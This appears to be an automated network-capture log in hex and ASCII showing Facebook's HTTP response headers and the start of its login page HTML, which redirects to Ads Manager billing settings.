                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19810INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19812INData Raw: 32 61 34 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c
                                                                                                                                                                                    Data Ascii: 2a4a<!DOCTYPE html><html l
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19812INData Raw: 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 66 31 74 47 71 4b 75 62 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77
                                                                                                                                                                                    Data Ascii: ang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f1tGqKub">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19813INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d
                                                                                                                                                                                    Data Ascii: eta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19814INData Raw: 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 72 2f 4e 6b 4a 57 66 32 44 48 41 79 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 58 4e 61 4d 6e 32 2b 22 20 6e 6f 6e 63 65 3d 22 66 31 74 47 71 4b 75 62 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 66 31 74 47 71 4b 75 62 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68
                                                                                                                                                                                    Data Ascii: ta-bootloader-hash="Yo2UzOh" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/NkJWf2DHAyg.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XNaMn2+" nonce="f1tGqKub"></script><script nonce="f1tGqKub">requireLazy(["HasteSupportData"],function(m){m.h
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19816INData Raw: 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d
                                                                                                                                                                                    Data Ascii: )).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"dom
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19817INData Raw: 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f
                                                                                                                                                                                    Data Ascii: {"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19819INData Raw: 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e
                                                                                                                                                                                    Data Ascii: ecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","N
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19820INData Raw: 54 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56
                                                                                                                                                                                    Data Ascii: T_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SV
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19822INData Raw: 62 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65
                                                                                                                                                                                    Data Ascii: bio.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowe
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19822INData Raw: 35 62 36 30 0d 0a 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 6c 61 74 61 6d 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 65 63 75 72 65 2e 70 61 79 75 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 64 6c 6f 63 61 6c 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 62 75 79 32 2e 62 6f 6b 75 2e 63 6f 6d 22 5d 7d 2c 34 39 32 30 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 45 6e 64 70 6f 69 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 62 75 67 4e 6f 42 61 74 63 68 69 6e 67 22 3a 66 61 6c 73 65 2c 22 65 6e 64 70 6f 69 6e 74 55 52
                                                                                                                                                                                    Data Ascii: 5b60.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":false,"endpointUR
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19824INData Raw: 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c 2f 65 78 70 6c 61 6e 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 77 65 6c 63 6f 6d 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 6e 75 78 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f
                                                                                                                                                                                    Data Ascii: \/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle\/welcome\/":1,"\/zero\/toggle\/nux\/":1,"\/zero\/toggle\/
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19825INData Raw: 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c 2f 73 6f 66 74 6e 75 64 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 61 63 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 7a 65 72 6f 5f 66 75 70 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c
                                                                                                                                                                                    Data Ascii: loha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/zero\/af_transition\/":1,"\/mobile\/zero\/af_transition\/action\/":1,"\/mobile\/zero\/freemium\/":1,"\/mobile\/zero\/freemium\/redirect\/":1,"\/mobile\/zero\/freemium\/zero_fup\/":1,"\/privacy\
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19827INData Raw: 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5f 63 68 61 6e 67 65 5c 2f 22 3a 31 2c 22 5c 2f 68 65 6c 70 5c 2f 63 6f 6e 74 61 63 74 5c 2f 22 3a 31 2c 22 5c 2f 73 75 72 76 65 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 79 61 6c 74 79 74 6f 70 75 70 5c 2f 61 63 63 65 70 74 5c 2f 22 3a 31 2c 22 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 73 74 61 74 75 73 5f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 6f 70 65 72 61 74 6f 72 5f
                                                                                                                                                                                    Data Ascii: t\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/":1,"\/preconfirmation\/contactpoint_change\/":1,"\/help\/contact\/":1,"\/survey\/":1,"\/upsell\/loyaltytopup\/accept\/":1,"\/settings\/":1,"\/lite\/":1,"\/zero_status_update\/":1,"\/operator_
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19828INData Raw: 4a 78 7a 65 66 32 35 79 44 6d 79 44 59 57 39 30 62 69 6c 78 6e 6c 6e 4f 74 70 33 71 57 50 66 46 53 31 67 65 38 2d 47 4c 50 71 4c 4a 72 54 5f 4a 7a 49 4d 5a 67 36 31 73 33 42 6d 63 68 48 62 33 77 45 5a 42 31 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 31 37 38 32 32 22 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 41 61 31 78 73 37 63 6d 35 6f 6d 4c 61 62 35 43 30 64 5a 6d 6e 4a 78 7a 65 66 32 35 79 44 6d 79 44 59 57 39 30 62 69 6c 78 6e 6c 6e 4f 74 70 33 71 57 50 66 46 53 31 67 65 38 2d 47 4c 50 71 4c 4a 72 54 5f 4a 7a 49 4d 5a 67 36 31 73 33 42 6d 63 68 48 62 33 77 45 5a 42 31 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 30 36 36 39 36 22 2c 5b 22 63 6c 65 61 72 54
                                                                                                                                                                                    Data Ascii: Jxzef25yDmyDYW90bilxnlnOtp3qWPfFS1ge8-GLPqLJrT_JzIMZg61s3BmchHb3wEZB1c"]},-1],["cr:717822",["TimeSliceImpl"],{"__rc":["TimeSliceImpl","Aa1xs7cm5omLab5C0dZmnJxzef25yDmyDYW90bilxnlnOtp3qWPfFS1ge8-GLPqLJrT_JzIMZg61s3BmchHb3wEZB1c"]},-1],["cr:806696",["clearT
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19829INData Raw: 46 4a 78 6a 62 74 37 5a 47 64 74 30 77 38 6e 71 4d 4e 56 71 72 68 65 46 6f 49 47 77 30 37 4f 68 31 45 64 5a 4a 75 36 70 2d 2d 75 5a 73 6c 51 51 57 6d 59 6a 59 39 67 4a 46 33 56 6e 4c 63 57 4d 72 4f 4a 5a 36 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 39 34 39 30 37 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 53 78 31 67 51 34 65 34 42 66 66 66 55 41 55 44 79 65 4b 4d 69 50 57 32 77 49 37 59 65 59 57 70 35 4d 6f 64 44 4b 44 63 5f 38 4f 36 57 4f 72 46 4b 77 42 31 38 43 71 71 34 66 43 56 62 55 53 6c 76 69 42 39 39 56 74 72 34 73 53 41 54 4c 6c 41 52 79 39 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 45 76 65 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 61 6d 70 6c 69 6e 67 22 3a 7b 22 62 61 6e 64 77 69 64 74 68 22 3a 30 2c 22 70 6c 61 79 22
                                                                                                                                                                                    Data Ascii: FJxjbt7ZGdt0w8nqMNVqrheFoIGw07Oh1EdZJu6p--uZslQQWmYjY9gJF3VnLcWMrOJZ6"]},-1],["cr:1094907",[],{"__rc":[null,"Aa1Sx1gQ4e4BfffUAUDyeKMiPW2wI7YeYWp5ModDKDc_8O6WOrFKwB18Cqq4fCVbUSlviB99Vtr4sSATLlARy9Q"]},-1],["EventConfig",[],{"sampling":{"bandwidth":0,"play"
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19831INData Raw: 22 42 69 67 50 69 70 65 22 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 22 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 5d 2c 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 5d 2c 5b 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74
                                                                                                                                                                                    Data Ascii: "BigPipe"],["Bootloader"],["TimeSlice"],["AsyncRequest"],["BanzaiScuba_DEPRECATED"],["VisualCompletionGating"],["FbtLogging"],["IntlQtEventFalcoEvent"],["RequireDeferredReference","unblock",[],[["AsyncRequest","BanzaiScuba_DEPRECATED","VisualCompletionGat
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19832INData Raw: 61 72 2f 6c 6f 67 69 6e 2f 3f 6c 6f 67 69 6e 5f 61 74 74 65 6d 70 74 3d 31 26 61 6d 70 3b 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 61 6d 70 3b 6c 77 76 3d 31 30 30 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 6f 6e 73 75 62 6d 69 74 3d 22 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6a 61 7a 6f 65 73 74 22 20 76 61 6c 75 65 3d 22 32 39 33 32 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22
                                                                                                                                                                                    Data Ascii: ar/login/?login_attempt=1&amp;next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;lwv=100" method="post" onsubmit=""><input type="hidden" name="jazoest" value="2932" autocomplete="off" /><input type="hidden" name="
